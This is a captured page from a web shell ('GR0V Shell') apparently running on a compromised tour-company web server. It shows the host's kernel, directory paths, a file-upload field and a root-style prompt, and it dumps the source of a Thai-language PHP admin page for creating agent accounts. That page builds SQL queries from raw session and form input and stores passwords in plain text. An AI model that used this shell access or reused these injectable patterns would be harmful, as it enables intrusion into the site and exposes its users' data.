? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/happyezystyle/Admin/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/happyezystyle/Admin/CreateAgent.php

<?
@session_start();
ob_start();
$useradmin = $_SESSION["useradmin"];
if(empty($useradmin)) 
{
echo "<script>alert('หน้านี้จำกัดเฉพาะ Admin เท่านั้น');history.back();</script>";
exit();
}
require_once "../include/tdate.php";
require_once "../include/connect.php";
require_once "../include/connectdb.php";

						  $sql="select * from useradmin where useradmin='$useradmin'";
						  $db_query=mysql_db_query($db,$sql);
						  $result=mysql_fetch_array($db_query);
						  $id=$result[id];
						  $adminname=$result[name];
						  $user_admin=$result[useradmin];
						  $pass_admin=$result[passadmin];
?>
 <? if($_POST[Submit] == "สร้างเอเจ้นท์"){
$sql1="INSERT INTO user (u_id,name,lname,class,tel,email,company,user,pass) values('','$_POST[name]','$_POST[lname]','','$_POST[tel]','$_POST[email]','$_POST[company]','$_POST[user]','$_POST[pass]')";
mysql_query($sql1);
 echo '<script> alert("เรียบร้อย");</script>';
}else{ echo '<script> alert("echo $sql1");</script>';
}
?>
<html>
<head>
<title><? echo "$headtxt"; ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<!-- Fireworks MX Dreamweaver MX target.  Created Sat Apr 02 10:29:23 GMT+0700 (SE Asia Standard Time) 2011-->
<link href="../css/style.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#ffffff">
<div align="center"><strong> 
  </strong>
  <table width="89%" border="0" align="center" cellpadding="1" cellspacing="1">
    <tr valign="top"> 
      <td width="57%"><? echo "$headtxt | $e_date $etime"; ?><br>
        <div align="left">หน้าปัจจุบันของคุณ : 
          <a href="Main.php">หน้าหลัก</a> --&gt; 
          <strong>ตั้งเอเจ้นท์</strong></div></td>
      <td width="43%"> <div align="right">ยินดีต้อนรับคุณ 
          <? echo "<u>$adminname</u>"; ?> เข้าใช้งานในระบบ<br>
          [ <a href="ChangePass.php">เปลี่ยนรหัสผ่าน</a> 
          ] <a href="logout.php">ออกจากระบบ</a> </div></td>
    </tr>
    <tr> 
      <td colspan="2"><table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#E9E9E6">
          <tr> 
            <td><div align="center"> 
                <table width="100%" border="0" cellspacing="1" cellpadding="1">
                  <tr> 
                    <td><div align="center"><br>
                        <table width="100%" border="0" cellspacing="1" cellpadding="1">
                          <tr> 
                            <td><div align="center">
                                <?php
						  $sql_1="select * from useradmin where useradmin = '$useradmin'";
						  $db_query=mysql_db_query($db,$sql_1);
						  $result1=mysql_fetch_array($db_query);
						  $idx=$result1[id];
						  $pass1=$result1[passadmin];
						?>
                                 
                                <table width="583" border="0" align="center" cellpadding="1" cellspacing="1">
                                  <form method="post" action="CreateAgentsave.php" enctype="multipart/form-data" >
                                    <tr>
                                      <td>&nbsp;</td>
                                      <td>&nbsp;</td>
                                    </tr>
                                    <tr>
                                      <td><div align="right">ชื่อ: </div></td>
                                      <td><input name=name type=text class="input" id=name size=30></td>
                                    </tr>
                                    <tr>
                                      <td width="117"><div align="right">นามสกุล: </div></td>
                                      <td width="459"><input name=lname type=text class="input" id=lname size=30></td>
                                    </tr>
                                    <tr>
                                      <td><div align="right">เบอร์โทร: </div></td>
                                      <td><input name=tel type=text class="input" id=tel size=30></td>
                                    </tr>
                                    <tr>
                                      <td><div align="right">อีเมล์: </div></td>
                                      <td><input name=email type=text class="input" id=email size=30></td>
                                    </tr>
                                    <tr>
                                      <td><div align="right">องค์กรณ </div></td>
                                      <td><input name=company type=text class="input" id=company size=30></td>
                                    </tr>
                                    <tr>
                                      <td><div align="right">Username: </div></td>
                                      <td><input name=user type=text class="input" id=user size=30></td>
                                    </tr>
                                    <tr> 
                                      <td><div align="right">รหัสผ่านใหม่ 
                                          : </div></td>
                                      <td> 
                                        <input name=pass type=password class="input" id=pass size=18></td>
                                    </tr>
                                    <tr> 
                                      <td>&nbsp;</td>
                                      <td> 
                                        <input name="submit" type=submit value=สร้างเอเจ้นท์ class="submit" onClick="return confirm ('คุณต้องการสร้างเอเจ้นท์ใหม่ ใช่ หรือ ไม่? ') ">
                                        </td>
                                    </tr>
                                  </form>
                                </table>
                            </div></td>
                          </tr>
                        </table>
                        <br>
                        <br>
                      </div></td>
                  </tr>
                </table>
              </div></td>
          </tr>
        </table></td>
    </tr>
    <tr> 
      <td colspan="2"><div align="center"><br>
          <? echo "$buttomtxt"; ?> </div></td>
    </tr>
  </table>
  
</div>
</body>
</html>

T1KUS90T
  root-grov@210.1.60.28:~$